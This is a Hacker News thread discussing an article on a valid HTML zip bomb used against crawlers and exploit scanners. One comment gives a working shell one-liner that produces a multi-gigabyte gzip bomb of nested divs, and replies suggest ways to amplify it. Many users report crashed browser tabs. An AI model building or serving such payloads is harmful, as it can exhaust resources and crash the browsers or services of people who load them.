A valid HTML zip bomb

(ache.one)

137 points | by Bogdanp 1 day ago

14 comments

bhaney 1 day ago
Neat approach. I make my anti-crawler HTML zip bombs like this:
```
    (echo '<html><head></head><body>' && yes "<div>") | dd bs=1M count=10240 iflag=fullblock | gzip > bomb.html.gz
```
So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.
[-]
- pyman 1 day ago
  
  This is a great idea.
  LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.
  We need more ideas like this!
  
  [-]
  - bhaney 1 day ago
    
    This is the same idea as in the article, just an alternative flavor of generating the zip bomb.
    And I actually only serve this to exploit scanners, not LLM crawlers.
    I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:
    - The site's robots.txt didn't actually say what the author thought they had made it say
    - The crawler had nothing to with the crawler it was claiming to be, it just hijacked a user agent to deflect blame
    It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.
    
    [-]
    - shakna 1 day ago
      
      Perplexity certainly was ignoring robots.txt [0]
      Anthropic... Their robots.txt requires a delay to be defined, even though its an optional extension. But whatever.
      [0] https://www.wired.com/story/perplexity-is-a-bullshit-machine...
    - pyman 1 day ago
      
      There's plenty of evidence to the contrary;
      https://mjtsai.com/blog/2024/06/24/ai-companies-ignoring-rob...
- _ache_ 1 day ago
  
  Nice command line.
chatmasta 1 day ago

Note: the submission link is not the zip bomb. It’s safe to click.

[-]
- abirch 1 day ago
  
  Sounds like something a person linking to a zip bomb would say :-D
andrew_eu 1 day ago

I can imagine the large scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb it could be they just discard the chunks that are inside of a comment. The same trick could be applied to other elements in the HTML though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs that could also have an amplifying effect on the bad scraper.

[-]
- _ache_ 1 day ago
  
  There is definitively improvements that can be made. The comment part is more about aesthetic as it is not needed actually, you could have just put the zip chunk in a `div`, I guess.
PeterStuer 1 day ago

For every 1 robots.txt that is genuinly configured, there's 9 that make absolutely no sense at all.
Worse. GETing the robots.txt automatically flags you as a 'bot'!
So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that your hired cheapest junior webadmin copy/pasted there from some reddit comment, we now have to jump through hoops such as geeting hhe robots.txt from a separate vpn etc.

[-]
- Grimblewald 1 day ago
  
  Well, robots.txt being an opaque and opt out system was broken from the start. I've just started havi g hidden links and pages only mentioned in robots.txt and any ip that tries those is immediatly blocked for 24 hours. There is no reason to continue entertaining these companies.
slig 1 day ago

If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?

[-]
- bhaney 1 day ago
  If you're doing this through cloudflare, you'll want to add the response header
```
    cache-control: no-transform
```
  so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.
  That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.
- uxjw 1 day ago
  
  Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/
  
  [-]
  - cyanydeez 1 day ago
    
    Do you think Meta AI's llama 4 failed so badly cause they ended up crawling a bunch of labrynths?
Alifatisk 16 hours ago

I dislike that the websites sidebar all of sudden collapses during scrolling, it shifts all the content to the left in middle of reading
fdomingues 16 hours ago

That content shift on page scroll is horrendous. Please don't do that, there is no need to auto hide a side bar.
Telemakhos 1 day ago

Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.
can16358p 1 day ago

Crashing Safari on iOS (not technically crashing the whole app, but the tab displays internal WebKit error).
cooprh 1 day ago

Crashed 1password on safari haha
xd1936 1 day ago

Risky click
ranger_danger 1 day ago

Did not crash Firefox nor Chrome for me on Linux.

[-]
- AndrewThrowaway 13 hours ago
  
  Crashed Chrome tab on Windows instantly but Firefox is fine. It shows loading but pressing Ctrl + U even shows the very start of that fake HTML.
- _ache_ 1 day ago
  
  Perhaps you have very generous limits on RAM allocation per thread. I have 32GB, 128 with swap and still crash (silently on Firefox and with a dedicated screen on Chrome).
  
  [-]
  - throwaway127482 1 day ago
    
    Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04
    
    [-]
    - _ache_ 1 day ago
      
      Usually in /etc/limits.conf. The field `as` for address space will be my guess, but I not sure, maybe `data`. The man page `man limits.conf` isn't very descriptive.
      
      [-]
      - inetknght 1 day ago
        
        > The man page `man limits.conf` isn't very descriptive.
        Looks to me like it's quite descriptive. What information do you think is missing?
        https://www.man7.org/linux/man-pages/man5/limits.conf.5.html
        
        [-]
        
        _ache_ 22 hours ago
        
        What is `data` ? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical ?
        What is maximum filesize in a context of a process ?! I mean what happens if a file is bigger ? Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
        I have a bunch of questions.
- palmfacehn 1 day ago
  
  Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
  
  [-]
  - meinersbur 1 day ago
    
    It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to stop a parser to bail early.
    
    [-]
    - palmfacehn 1 day ago
      
      For my usage, the compressed size difference with deeply nested divs was negligible.
- esperent 1 day ago
  
  It crashed the tab in Brave on Android for me.
- johnisgood 1 day ago
  
  It crashed the tab on Vivaldi (Linux).
Tepix 1 day ago

Imagine you‘re a crawler operator. Do you really have a problem with documents like this? I don’t think so.
ChrisArchitect 1 day ago

Related:
Fun with gzip bombs and email clients
https://news.ycombinator.com/item?id=44651536